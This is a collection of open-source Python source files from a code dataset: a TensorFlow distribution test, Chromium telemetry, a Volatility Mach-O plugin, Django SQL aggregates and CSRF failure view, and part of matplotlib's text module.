diag = np.array([[1, 2, 3], [2, 3, 2]], dtype=np.float32)
actual_mvn_entropy = np.concatenate([
[stats.multivariate_normal(shift[i], np.diag(diag[i]**2)).entropy()]
for i in range(len(diag))])
fake_mvn = self._cls()(
ds.MultivariateNormalDiag(
loc=array_ops.zeros_like(shift),
scale_diag=array_ops.ones_like(diag),
validate_args=True),
bs.AffineLinearOperator(
shift,
scale=la.LinearOperatorDiag(diag, is_non_singular=True),
validate_args=True),
validate_args=True)
self.assertAllClose(actual_mvn_entropy,
fake_mvn.entropy().eval())
class ScalarToMultiTest(test.TestCase):
def _cls(self):
return ds.TransformedDistribution
def setUp(self):
self._shift = np.array([-1, 0, 1], dtype=np.float32)
self._tril = np.array([[[1., 0, 0],
[2, 1, 0],
[3, 2, 1]],
[[2, 0, 0],
[3, 2, 0],
[4, 3, 2]]],
dtype=np.float32)
def _testMVN(self,
base_distribution_class,
base_distribution_kwargs,
batch_shape=(),
event_shape=(),
not_implemented_message=None):
with self.test_session() as sess:
# Overriding shapes must be compatible w/bijector; most bijectors are
# batch_shape agnostic and only care about event_ndims.
# In the case of `Affine`, if we got it wrong then it would fire an
# exception due to incompatible dimensions.
batch_shape_pl = array_ops.placeholder(
dtypes.int32, name="dynamic_batch_shape")
event_shape_pl = array_ops.placeholder(
dtypes.int32, name="dynamic_event_shape")
feed_dict = {batch_shape_pl: np.array(batch_shape, dtype=np.int32),
event_shape_pl: np.array(event_shape, dtype=np.int32)}
fake_mvn_dynamic = self._cls()(
distribution=base_distribution_class(validate_args=True,
**base_distribution_kwargs),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=batch_shape_pl,
event_shape=event_shape_pl,
validate_args=True)
fake_mvn_static = self._cls()(
distribution=base_distribution_class(validate_args=True,
**base_distribution_kwargs),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=batch_shape,
event_shape=event_shape,
validate_args=True)
actual_mean = np.tile(self._shift, [2, 1]) # Affine elided this tile.
actual_cov = np.matmul(self._tril, np.transpose(self._tril, [0, 2, 1]))
def actual_mvn_log_prob(x):
return np.concatenate([
[stats.multivariate_normal(
actual_mean[i], actual_cov[i]).logpdf(x[:, i, :])]
for i in range(len(actual_cov))]).T
actual_mvn_entropy = np.concatenate([
[stats.multivariate_normal(
actual_mean[i], actual_cov[i]).entropy()]
for i in range(len(actual_cov))])
self.assertAllEqual([3], fake_mvn_static.event_shape)
self.assertAllEqual([2], fake_mvn_static.batch_shape)
self.assertAllEqual(tensor_shape.TensorShape(None),
fake_mvn_dynamic.event_shape)
self.assertAllEqual(tensor_shape.TensorShape(None),
fake_mvn_dynamic.batch_shape)
x = fake_mvn_static.sample(5, seed=0).eval()
for unsupported_fn in (fake_mvn_static.log_cdf,
fake_mvn_static.cdf,
fake_mvn_static.survival_function,
fake_mvn_static.log_survival_function):
with self.assertRaisesRegexp(NotImplementedError,
not_implemented_message):
unsupported_fn(x)
num_samples = 5e3
for fake_mvn, feed_dict in ((fake_mvn_static, {}),
(fake_mvn_dynamic, feed_dict)):
# Ensure sample works by checking first, second moments.
y = fake_mvn.sample(int(num_samples), seed=0)
x = y[0:5, ...]
sample_mean = math_ops.reduce_mean(y, 0)
centered_y = array_ops.transpose(y - sample_mean, [1, 2, 0])
sample_cov = math_ops.matmul(
centered_y, centered_y, transpose_b=True) / num_samples
[
sample_mean_,
sample_cov_,
x_,
fake_event_shape_,
fake_batch_shape_,
fake_log_prob_,
fake_prob_,
fake_entropy_,
] = sess.run([
sample_mean,
sample_cov,
x,
fake_mvn.event_shape_tensor(),
fake_mvn.batch_shape_tensor(),
fake_mvn.log_prob(x),
fake_mvn.prob(x),
fake_mvn.entropy(),
], feed_dict=feed_dict)
self.assertAllClose(actual_mean, sample_mean_, atol=0.1, rtol=0.1)
self.assertAllClose(actual_cov, sample_cov_, atol=0., rtol=0.1)
# Ensure all other functions work as intended.
self.assertAllEqual([5, 2, 3], x_.shape)
self.assertAllEqual([3], fake_event_shape_)
self.assertAllEqual([2], fake_batch_shape_)
self.assertAllClose(actual_mvn_log_prob(x_), fake_log_prob_,
atol=0., rtol=1e-6)
self.assertAllClose(np.exp(actual_mvn_log_prob(x_)), fake_prob_,
atol=0., rtol=1e-5)
self.assertAllClose(actual_mvn_entropy, fake_entropy_,
atol=0., rtol=1e-6)
def testScalarBatchScalarEvent(self):
self._testMVN(
base_distribution_class=ds.Normal,
base_distribution_kwargs={"loc": 0., "scale": 1.},
batch_shape=[2],
event_shape=[3],
not_implemented_message="not implemented when overriding event_shape")
def testScalarBatchNonScalarEvent(self):
self._testMVN(
base_distribution_class=ds.MultivariateNormalDiag,
base_distribution_kwargs={"loc": [0., 0., 0.],
"scale_diag": [1., 1, 1]},
batch_shape=[2],
not_implemented_message="not implemented")
with self.test_session():
# Can't override event_shape for scalar batch, non-scalar event.
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
self._cls()(
distribution=ds.MultivariateNormalDiag(loc=[0.], scale_diag=[1.]),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=[2],
event_shape=[3],
validate_args=True)
def testNonScalarBatchScalarEvent(self):
self._testMVN(
base_distribution_class=ds.Normal,
base_distribution_kwargs={"loc": [0., 0], "scale": [1., 1]},
event_shape=[3],
not_implemented_message="not implemented when overriding event_shape")
with self.test_session():
# Can't override batch_shape for non-scalar batch, scalar event.
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
self._cls()(
distribution=ds.Normal(loc=[0.], scale=[1.]),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=[2],
event_shape=[3],
validate_args=True)
def testNonScalarBatchNonScalarEvent(self):
with self.test_session():
# Can't override event_shape and/or batch_shape for non_scalar batch,
# non-scalar event.
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
self._cls()(
distribution=ds.MultivariateNormalDiag(loc=[[0.]],
scale_diag=[[1.]]),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=[2],
event_shape=[3],
validate_args=True)
if __name__ == "__main__":
test.main()
| apache-2.0 |
MyAOSP/external_chromium_org | tools/telemetry/telemetry/core/system_info.py | 38 | 1446 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.core import gpu_info
class SystemInfo(object):
"""Provides low-level system information."""
def __init__(self, model_name, gpu_dict):
if (model_name == None) or (gpu_dict == None):
raise Exception("Missing model_name or gpu_dict argument")
self._model_name = model_name
self._gpu = gpu_info.GPUInfo.FromDict(gpu_dict)
@classmethod
def FromDict(cls, attrs):
"""Constructs a SystemInfo from a dictionary of attributes.
Attributes currently required to be present in the dictionary:
model_name (string): a platform-dependent string
describing the model of machine, or the empty string if not
supported.
gpu (object containing GPUInfo's required attributes)
"""
return cls(attrs["model_name"], attrs["gpu"])
@property
def model_name(self):
"""A string describing the machine model.
This is a highly platform-dependent value and not currently
specified for any machine type aside from Macs. On Mac OS, this
is the model identifier, reformatted slightly; for example,
'MacBookPro 10.1'."""
return self._model_name
@property
def gpu(self):
"""A GPUInfo object describing the graphics processor(s) on the system."""
return self._gpu
| bsd-3-clause |
DarrenRainey/volatility | volatility/plugins/machoinfo.py | 58 | 1502 | # Volatility
# Copyright (C) 2009-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
import volatility.plugins.crashinfo as crashinfo
class MachOInfo(crashinfo.CrashInfo):
"""Dump Mach-O file format information"""
target_as = ['MachOAddressSpace']
def render_text(self, outfd, data):
header = data.get_header()
outfd.write("Magic: {0:#x}\n".format(header.magic))
outfd.write("Architecture: {0}-bit\n".format(data.bits))
self.table_header(outfd, [("File Offset", "[addrpad]"),
("Memory Offset", "[addrpad]"),
("Size", "[addrpad]"),
("Name", "")])
for seg in data.segs:
self.table_row(outfd, seg.fileoff, seg.vmaddr, seg.vmsize, seg.segname)
| gpl-2.0 |
trezorg/django | django/db/models/sql/aggregates.py | 277 | 4176 | """
Classes to represent the default SQL aggregate functions
"""
class AggregateField(object):
"""An internal field mockup used to identify aggregates in the
data-conversion parts of the database backend.
"""
def __init__(self, internal_type):
self.internal_type = internal_type
def get_internal_type(self):
return self.internal_type
ordinal_aggregate_field = AggregateField('IntegerField')
computed_aggregate_field = AggregateField('FloatField')
class Aggregate(object):
"""
Default SQL Aggregate.
"""
is_ordinal = False
is_computed = False
sql_template = '%(function)s(%(field)s)'
def __init__(self, col, source=None, is_summary=False, **extra):
"""Instantiate an SQL aggregate
* col is a column reference describing the subject field
of the aggregate. It can be an alias, or a tuple describing
a table and column name.
* source is the underlying field or aggregate definition for
the column reference. If the aggregate is not an ordinal or
computed type, this reference is used to determine the coerced
output type of the aggregate.
* extra is a dictionary of additional data to provide for the
aggregate definition
Also utilizes the class variables:
* sql_function, the name of the SQL function that implements the
aggregate.
* sql_template, a template string that is used to render the
aggregate into SQL.
* is_ordinal, a boolean indicating if the output of this aggregate
is an integer (e.g., a count)
* is_computed, a boolean indicating if this output of this aggregate
is a computed float (e.g., an average), regardless of the input
type.
"""
self.col = col
self.source = source
self.is_summary = is_summary
self.extra = extra
# Follow the chain of aggregate sources back until you find an
# actual field, or an aggregate that forces a particular output
# type. This type of this field will be used to coerce values
# retrieved from the database.
tmp = self
while tmp and isinstance(tmp, Aggregate):
if getattr(tmp, 'is_ordinal', False):
tmp = ordinal_aggregate_field
elif getattr(tmp, 'is_computed', False):
tmp = computed_aggregate_field
else:
tmp = tmp.source
self.field = tmp
def relabel_aliases(self, change_map):
if isinstance(self.col, (list, tuple)):
self.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
def as_sql(self, qn, connection):
"Return the aggregate, rendered as SQL."
if hasattr(self.col, 'as_sql'):
field_name = self.col.as_sql(qn, connection)
elif isinstance(self.col, (list, tuple)):
field_name = '.'.join([qn(c) for c in self.col])
else:
field_name = self.col
params = {
'function': self.sql_function,
'field': field_name
}
params.update(self.extra)
return self.sql_template % params
class Avg(Aggregate):
is_computed = True
sql_function = 'AVG'
class Count(Aggregate):
is_ordinal = True
sql_function = 'COUNT'
sql_template = '%(function)s(%(distinct)s%(field)s)'
def __init__(self, col, distinct=False, **extra):
super(Count, self).__init__(col, distinct=distinct and 'DISTINCT ' or '', **extra)
class Max(Aggregate):
sql_function = 'MAX'
class Min(Aggregate):
sql_function = 'MIN'
class StdDev(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(StdDev, self).__init__(col, **extra)
self.sql_function = sample and 'STDDEV_SAMP' or 'STDDEV_POP'
class Sum(Aggregate):
sql_function = 'SUM'
class Variance(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(Variance, self).__init__(col, **extra)
self.sql_function = sample and 'VAR_SAMP' or 'VAR_POP'
| bsd-3-clause |
Gagaro/django | django/views/csrf.py | 30 | 5505 | from django.conf import settings
from django.http import HttpResponseForbidden
from django.template import Context, Engine, TemplateDoesNotExist, loader
from django.utils.translation import ugettext as _
from django.utils.version import get_docs_version
# We include the template inline since we need to be able to reliably display
# this error message, especially for the sake of developers, and there isn't any
# other way of making it available independent of what is in the settings file.
# Only the text appearing with DEBUG=False is translated. Normal translation
# tags cannot be used with this inline templates as makemessages would not be
# able to discover the strings.
CSRF_FAILURE_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>403 Forbidden</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
#info { background:#f6f6f6; }
#info ul { margin: 0.5em 4em; }
#info p, #summary p { padding-top:10px; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ title }} <span>(403)</span></h1>
<p>{{ main }}</p>
{% if no_referer %}
<p>{{ no_referer1 }}</p>
<p>{{ no_referer2 }}</p>
{% endif %}
{% if no_cookie %}
<p>{{ no_cookie1 }}</p>
<p>{{ no_cookie2 }}</p>
{% endif %}
</div>
{% if DEBUG %}
<div id="info">
<h2>Help</h2>
{% if reason %}
<p>Reason given for failure:</p>
<pre>
{{ reason }}
</pre>
{% endif %}
<p>In general, this can occur when there is a genuine Cross Site Request Forgery, or when
<a
href="https://docs.djangoproject.com/en/{{ docs_version }}/ref/csrf/">Django's
CSRF mechanism</a> has not been used correctly. For POST forms, you need to
ensure:</p>
<ul>
<li>Your browser is accepting cookies.</li>
<li>The view function passes a <code>request</code> to the template's <a
href="https://docs.djangoproject.com/en/dev/topics/templates/#django.template.backends.base.Template.render"><code>render</code></a>
method.</li>
<li>In the template, there is a <code>{% templatetag openblock %} csrf_token
{% templatetag closeblock %}</code> template tag inside each POST form that
targets an internal URL.</li>
<li>If you are not using <code>CsrfViewMiddleware</code>, then you must use
<code>csrf_protect</code> on any views that use the <code>csrf_token</code>
template tag, as well as those that accept the POST data.</li>
</ul>
<p>You're seeing the help section of this page because you have <code>DEBUG =
True</code> in your Django settings file. Change that to <code>False</code>,
and only the initial error message will be displayed. </p>
<p>You can customize this page using the CSRF_FAILURE_VIEW setting.</p>
</div>
{% else %}
<div id="explanation">
<p><small>{{ more }}</small></p>
</div>
{% endif %}
</body>
</html>
"""
CSRF_FAILURE_TEMPLATE_NAME = "403_csrf.html"
def csrf_failure(request, reason="", template_name=CSRF_FAILURE_TEMPLATE_NAME):
"""
Default view used when request fails CSRF protection
"""
from django.middleware.csrf import REASON_NO_REFERER, REASON_NO_CSRF_COOKIE
c = Context({
'title': _("Forbidden"),
'main': _("CSRF verification failed. Request aborted."),
'reason': reason,
'no_referer': reason == REASON_NO_REFERER,
'no_referer1': _(
"You are seeing this message because this HTTPS site requires a "
"'Referer header' to be sent by your Web browser, but none was "
"sent. This header is required for security reasons, to ensure "
"that your browser is not being hijacked by third parties."),
'no_referer2': _(
"If you have configured your browser to disable 'Referer' headers, "
"please re-enable them, at least for this site, or for HTTPS "
"connections, or for 'same-origin' requests."),
'no_cookie': reason == REASON_NO_CSRF_COOKIE,
'no_cookie1': _(
"You are seeing this message because this site requires a CSRF "
"cookie when submitting forms. This cookie is required for "
"security reasons, to ensure that your browser is not being "
"hijacked by third parties."),
'no_cookie2': _(
"If you have configured your browser to disable cookies, please "
"re-enable them, at least for this site, or for 'same-origin' "
"requests."),
'DEBUG': settings.DEBUG,
'docs_version': get_docs_version(),
'more': _("More information is available with DEBUG=True."),
})
try:
t = loader.get_template(template_name)
except TemplateDoesNotExist:
if template_name == CSRF_FAILURE_TEMPLATE_NAME:
# If the default template doesn't exist, use the string template.
t = Engine().from_string(CSRF_FAILURE_TEMPLATE)
else:
# Raise if a developer-specified template doesn't exist.
raise
return HttpResponseForbidden(t.render(c), content_type='text/html')
| bsd-3-clause |
dimroc/tensorflow-mnist-tutorial | lib/python3.6/site-packages/matplotlib/text.py | 10 | 82852 | """
Classes for including text in a figure.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
from six.moves import zip
import math
import warnings
import contextlib
import numpy as np
from matplotlib import cbook
from matplotlib import rcParams
import matplotlib.artist as artist
from matplotlib.artist import Artist
from matplotlib.cbook import is_string_like, maxdict
from matplotlib import docstring
from matplotlib.font_manager import FontProperties
from matplotlib.patches import FancyBboxPatch
from matplotlib.patches import FancyArrowPatch, Rectangle
import matplotlib.transforms as mtransforms
from matplotlib.transforms import Affine2D, Bbox, Transform
from matplotlib.transforms import BboxBase, BboxTransformTo
from matplotlib.lines import Line2D
from matplotlib.path import Path
from matplotlib.artist import allow_rasterization
from matplotlib.backend_bases import RendererBase
from matplotlib.textpath import TextPath
def _process_text_args(override, fontdict=None, **kwargs):
"Return an override dict. See :func:`~pyplot.text' docstring for info"
if fontdict is not None:
override.update(fontdict)
override.update(kwargs)
return override
@contextlib.contextmanager
def _wrap_text(textobj):
"""
Temporarily inserts newlines to the text if the wrap option is enabled.
"""
if textobj.get_wrap():
old_text = textobj.get_text()
try:
textobj.set_text(textobj._get_wrapped_text())
yield textobj
finally:
textobj.set_text(old_text)
else:
yield textobj
# Extracted from Text's method to serve as a function
def get_rotation(rotation):
"""
Return the text angle as float. The returned
angle is between 0 and 360 deg.
*rotation* may be 'horizontal', 'vertical', or a numeric value in degrees.
"""
try:
angle = float(rotation)
except (ValueError, TypeError):
isString = isinstance(rotation, six.string_types)
if ((isString and rotation == 'horizontal') or rotation is None):
angle = 0.
elif (isString and rotation == 'vertical'):
angle = 90.
else:
raise ValueError("rotation is {0} expected either 'horizontal'"
" 'vertical', numeric value or"
"None".format(rotation))
return angle % 360
# these are not available for the object inspector until after the
# class is build so we define an initial set here for the init
# function and they will be overridden after object defn
docstring.interpd.update(Text="""
========================== ================================================
Property Value
========================== ================================================
alpha float or None
animated [True | False]
backgroundcolor any matplotlib color
bbox rectangle prop dict plus key 'pad' which is a
pad in points; if a boxstyle is supplied as
a string, then pad is instead a fraction
of the font size
clip_box a matplotlib.transform.Bbox instance
clip_on [True | False]
color any matplotlib color
family ['serif' | 'sans-serif' | 'cursive' |
'fantasy' | 'monospace']
figure a matplotlib.figure.Figure instance
fontproperties a matplotlib.font_manager.FontProperties
instance
horizontalalignment or ha ['center' | 'right' | 'left']
label any string
linespacing float
lod [True | False]
multialignment ['left' | 'right' | 'center' ]
name or fontname string e.g.,
['Sans' | 'Courier' | 'Helvetica' ...]
position (x,y)
rotation [ angle in degrees 'vertical' | 'horizontal'
rotation_mode [ None | 'anchor']
size or fontsize [size in points | relative size e.g., 'smaller',
'x-large']
style or fontstyle [ 'normal' | 'italic' | 'oblique']
text string
transform a matplotlib.transform transformation instance
usetex [True | False | None]
variant ['normal' | 'small-caps']
verticalalignment or va ['center' | 'top' | 'bottom' | 'baseline' |
'center_baseline' ]
visible [True | False]
weight or fontweight ['normal' | 'bold' | 'heavy' | 'light' |
'ultrabold' | 'ultralight']
wrap [True | False]
x float
y float
zorder any number
========================== ===============================================
""")
# TODO : This function may move into the Text class as a method. As a
# matter of fact, The information from the _get_textbox function
# should be available during the Text._get_layout() call, which is
# called within the _get_textbox. So, it would better to move this
# function as a method with some refactoring of _get_layout method.
def _get_textbox(text, renderer):
"""
Calculate the bounding box of the text. Unlike
:meth:`matplotlib.text.Text.get_extents` method, The bbox size of
the text before the rotation is calculated.
"""
projected_xs = []
projected_ys = []
theta = np.deg2rad(text.get_rotation())
tr = mtransforms.Affine2D().rotate(-theta)
_, parts, d = text._get_layout(renderer)
for t, wh, x, y in parts:
w, h = wh
xt1, yt1 = tr.transform_point((x, y))
yt1 -= d
xt2, yt2 = xt1 + w, yt1 + h
projected_xs.extend([xt1, xt2])
projected_ys.extend([yt1, yt2])
xt_box, yt_box = min(projected_xs), min(projected_ys)
w_box, h_box = max(projected_xs) - xt_box, max(projected_ys) - yt_box
tr = mtransforms.Affine2D().rotate(theta)
x_box, y_box = tr.transform_point((xt_box, yt_box))
return x_box, y_box, w_box, h_box
class Text(Artist):
"""
Handle storing and drawing of text in window or data coordinates.
"""
zorder = 3
_cached = maxdict(50)
def __str__(self):
return "Text(%g,%g,%s)" % (self._x, self._y, repr(self._text))
def __init__(self,
x=0, y=0, text='',
color=None, # defaults to rc params
verticalalignment='baseline',
horizontalalignment='left',
multialignment=None,
fontproperties=None, # defaults to FontProperties()
rotation=None,
linespacing=None,
rotation_mode=None,
usetex=None, # defaults to rcParams['text.usetex']
wrap=False,
**kwargs
):
"""
Create a :class:`~matplotlib.text.Text` instance at *x*, *y*
with string *text*.
Valid kwargs are
%(Text)s
"""
Artist.__init__(self)
self._x, self._y = x, y
if color is None:
color = rcParams['text.color']
if fontproperties is None:
fontproperties = FontProperties()
elif is_string_like(fontproperties):
fontproperties = FontProperties(fontproperties)
self.set_text(text)
self.set_color(color)
self.set_usetex(usetex)
self.set_wrap(wrap)
self._verticalalignment = verticalalignment
self._horizontalalignment = horizontalalignment
self._multialignment = multialignment
self._rotation = rotation
self._fontproperties = fontproperties
self._bbox_patch = None # a FancyBboxPatch instance
self._renderer = None
if linespacing is None:
linespacing = 1.2 # Maybe use rcParam later.
self._linespacing = linespacing
self.set_rotation_mode(rotation_mode)
self.update(kwargs)
def update(self, kwargs):
"""
Update properties from a dictionary.
"""
bbox = kwargs.pop('bbox', None)
super(Text, self).update(kwargs)
if bbox:
self.set_bbox(bbox) # depends on font properties
def __getstate__(self):
d = super(Text, self).__getstate__()
# remove the cached _renderer (if it exists)
d['_renderer'] = None
return d
def contains(self, mouseevent):
"""Test whether the mouse event occurred in the patch.
In the case of text, a hit is true anywhere in the
axis-aligned bounding-box containing the text.
Returns True or False.
"""
if six.callable(self._contains):
return self._contains(self, mouseevent)
if not self.get_visible() or self._renderer is None:
return False, {}
l, b, w, h = self.get_window_extent().bounds
r, t = l + w, b + h
x, y = mouseevent.x, mouseevent.y
inside = (l <= x <= r and b <= y <= t)
cattr = {}
# if the text has a surrounding patch, also check containment for it,
# and merge the results with the results for the text.
if self._bbox_patch:
patch_inside, patch_cattr = self._bbox_patch.contains(mouseevent)
inside = inside or patch_inside
cattr["bbox_patch"] = patch_cattr
return inside, cattr
def _get_xy_display(self):
'get the (possibly unit converted) transformed x, y in display coords'
x, y = self.get_unitless_position()
return self.get_transform().transform_point((x, y))
def _get_multialignment(self):
if self._multialignment is not None:
return self._multialignment
else:
return self._horizontalalignment
def get_rotation(self):
'return the text angle as float in degrees'
return get_rotation(self._rotation) # string_or_number -> number
def set_rotation_mode(self, m):
"""
set text rotation mode. If "anchor", the un-rotated text
will first aligned according to their *ha* and
*va*, and then will be rotated with the alignement
reference point as a origin. If None (default), the text will be
rotated first then will be aligned.
"""
if m is None or m in ["anchor", "default"]:
self._rotation_mode = m
else:
raise ValueError("Unknown rotation_mode : %s" % repr(m))
self.stale = True
def get_rotation_mode(self):
"get text rotation mode"
return self._rotation_mode
def update_from(self, other):
'Copy properties from other to self'
Artist.update_from(self, other)
self._color = other._color
self._multialignment = other._multialignment
self._verticalalignment = other._verticalalignment
self._horizontalalignment = other._horizontalalignment
self._fontproperties = other._fontproperties.copy()
self._rotation = other._rotation
self._picker = other._picker
self._linespacing = other._linespacing
self.stale = True
def _get_layout(self, renderer):
"""
return the extent (bbox) of the text together with
multiple-alignment information. Note that it returns an extent
of a rotated text when necessary.
"""
key = self.get_prop_tup(renderer=renderer)
if key in self._cached:
return self._cached[key]
horizLayout = []
thisx, thisy = 0.0, 0.0
xmin, ymin = 0.0, 0.0
width, height = 0.0, 0.0
lines = self.get_text().split('\n')
whs = np.zeros((len(lines), 2))
horizLayout = np.zeros((len(lines), 4))
# Find full vertical extent of font,
# including ascenders and descenders:
tmp, lp_h, lp_bl = renderer.get_text_width_height_descent('lp',
self._fontproperties,
ismath=False)
offsety = (lp_h - lp_bl) * self._linespacing
baseline = 0
for i, line in enumerate(lines):
clean_line, ismath = self.is_math_text(line, self.get_usetex())
if clean_line:
w, h, d = renderer.get_text_width_height_descent(clean_line,
self._fontproperties,
ismath=ismath)
else:
w, h, d = 0, 0, 0
# For multiline text, increase the line spacing when the
# text net-height(excluding baseline) is larger than that
# of a "l" (e.g., use of superscripts), which seems
# what TeX does.
h = max(h, lp_h)
d = max(d, lp_bl)
whs[i] = w, h
baseline = (h - d) - thisy
thisy -= max(offsety, (h - d) * self._linespacing)
horizLayout[i] = thisx, thisy, w, h
thisy -= d
width = max(width, w)
descent = d
ymin = horizLayout[-1][1]
ymax = horizLayout[0][1] + horizLayout[0][3]
height = ymax - ymin
xmax = xmin + width
# get the rotation matrix
M = Affine2D().rotate_deg(self.get_rotation())
offsetLayout = np.zeros((len(lines), 2))
offsetLayout[:] = horizLayout[:, 0:2]
# now offset the individual text lines within the box
if len(lines) > 1: # do the multiline aligment
malign = self._get_multialignment()
if malign == 'center':
offsetLayout[:, 0] += width / 2.0 - horizLayout[:, 2] / 2.0
elif malign == 'right':
offsetLayout[:, 0] += width - horizLayout[:, 2]
# the corners of the unrotated bounding box
cornersHoriz = np.array(
[(xmin, ymin), (xmin, ymax), (xmax, ymax), (xmax, ymin)],
np.float_)
cornersHoriz[:, 1] -= descent
# now rotate the bbox
cornersRotated = M.transform(cornersHoriz)
txs = cornersRotated[:, 0]
tys = cornersRotated[:, 1]
# compute the bounds of the rotated box
xmin, xmax = txs.min(), txs.max()
ymin, ymax = tys.min(), tys.max()
width = xmax - xmin
height = ymax - ymin
# Now move the box to the target position offset the display
# bbox by alignment
halign = self._horizontalalignment
valign = self._verticalalignment
rotation_mode = self.get_rotation_mode()
if rotation_mode != "anchor":
# compute the text location in display coords and the offsets
# necessary to align the bbox with that location
if halign == 'center':
offsetx = (xmin + width / 2.0)
elif halign == 'right':
offsetx = (xmin + width)
else:
offsetx = xmin
if valign == 'center':
offsety = (ymin + height / 2.0)
elif valign == 'top':
offsety = (ymin + height)
elif valign == 'baseline':
offsety = (ymin + height) - baseline
elif valign == 'center_baseline':
offsety = ymin + height - baseline / 2.0
else:
offsety = ymin
else:
xmin1, ymin1 = cornersHoriz[0]
xmax1, ymax1 = cornersHoriz[2]
if halign == 'center':
offsetx = (xmin1 + xmax1) / 2.0
elif halign == 'right':
offsetx = xmax1
else:
offsetx = xmin1
if valign == 'center':
offsety = (ymin1 + ymax1) / 2.0
elif valign == 'top':
offsety = ymax1
elif valign == 'baseline':
offsety = ymax1 - baseline
elif valign == 'center_baseline':
offsety = (ymin1 + ymax1 - baseline) / 2.0
else:
offsety = ymin1
offsetx, offsety = M.transform_point((offsetx, offsety))
xmin -= offsetx
ymin -= offsety
bbox = Bbox.from_bounds(xmin, ymin, width, height)
# now rotate the positions around the first x,y position
xys = M.transform(offsetLayout)
xys -= (offsetx, offsety)
xs, ys = xys[:, 0], xys[:, 1]
ret = bbox, list(zip(lines, whs, xs, ys)), descent
self._cached[key] = ret
return ret
def set_bbox(self, rectprops):
"""
Draw a bounding box around self. rectprops are any settable
properties for a FancyBboxPatch, e.g., facecolor='red', alpha=0.5.
t.set_bbox(dict(facecolor='red', alpha=0.5))
The default boxstyle is 'square'. The mutation
scale of the FancyBboxPatch is set to the fontsize.
ACCEPTS: FancyBboxPatch prop dict
"""
if rectprops is not None:
props = rectprops.copy()
boxstyle = props.pop("boxstyle", None)
pad = props.pop("pad", None)
if boxstyle is None:
boxstyle = "square"
if pad is None:
pad = 4 # points
pad /= self.get_size() # to fraction of font size
else:
if pad is None:
pad = 0.3
# boxstyle could be a callable or a string
if is_string_like(boxstyle) and "pad" not in boxstyle:
boxstyle += ",pad=%0.2f" % pad
bbox_transmuter = props.pop("bbox_transmuter", None)
self._bbox_patch = FancyBboxPatch(
(0., 0.),
1., 1.,
boxstyle=boxstyle,
bbox_transmuter=bbox_transmuter,
transform=mtransforms.IdentityTransform(),
**props)
else:
self._bbox_patch = None
self._update_clip_properties()
def get_bbox_patch(self):
"""
Return the bbox Patch object. Returns None if the
FancyBboxPatch is not made.
"""
return self._bbox_patch
def update_bbox_position_size(self, renderer):
"""
Update the location and the size of the bbox. This method
should be used when the position and size of the bbox needs to
be updated before actually drawing the bbox.
"""
if self._bbox_patch:
trans = self.get_transform()
# don't use self.get_unitless_position here, which refers to text
# position in Text, and dash position in TextWithDash:
posx = float(self.convert_xunits(self._x))
posy = float(self.convert_yunits(self._y))
posx, posy = trans.transform_point((posx, posy))
x_box, y_box, w_box, h_box = _get_textbox(self, renderer)
self._bbox_patch.set_bounds(0., 0., w_box, h_box)
theta = np.deg2rad(self.get_rotation())
tr = mtransforms.Affine2D().rotate(theta)
tr = tr.translate(posx + x_box, posy + y_box)
self._bbox_patch.set_transform(tr)
fontsize_in_pixel = renderer.points_to_pixels(self.get_size())
self._bbox_patch.set_mutation_scale(fontsize_in_pixel)
def _draw_bbox(self, renderer, posx, posy):
""" Update the location and the size of the bbox
(FancyBboxPatch), and draw
"""
x_box, y_box, w_box, h_box = _get_textbox(self, renderer)
self._bbox_patch.set_bounds(0., 0., w_box, h_box)
theta = np.deg2rad(self.get_rotation())
tr = mtransforms.Affine2D().rotate(theta)
tr = tr.translate(posx + x_box, posy + y_box)
self._bbox_patch.set_transform(tr)
fontsize_in_pixel = renderer.points_to_pixels(self.get_size())
self._bbox_patch.set_mutation_scale(fontsize_in_pixel)
self._bbox_patch.draw(renderer)
def _update_clip_properties(self):
clipprops = dict(clip_box=self.clipbox,
clip_path=self._clippath,
clip_on=self._clipon)
if self._bbox_patch:
bbox = self._bbox_patch.update(clipprops)
def set_clip_box(self, clipbox):
"""
Set the artist's clip :class:`~matplotlib.transforms.Bbox`.
ACCEPTS: a :class:`matplotlib.transforms.Bbox` instance
"""
super(Text, self).set_clip_box(clipbox)
self._update_clip_properties()
def set_clip_path(self, path, transform=None):
"""
Set the artist's clip path, which may be:
* a :class:`~matplotlib.patches.Patch` (or subclass) instance
* a :class:`~matplotlib.path.Path` instance, in which case
an optional :class:`~matplotlib.transforms.Transform`
instance may be provided, which will be applied to the
path before using it for clipping.
* *None*, to remove the clipping path
For efficiency, if the path happens to be an axis-aligned
rectangle, this method will set the clipping box to the
corresponding rectangle and set the clipping path to *None*.
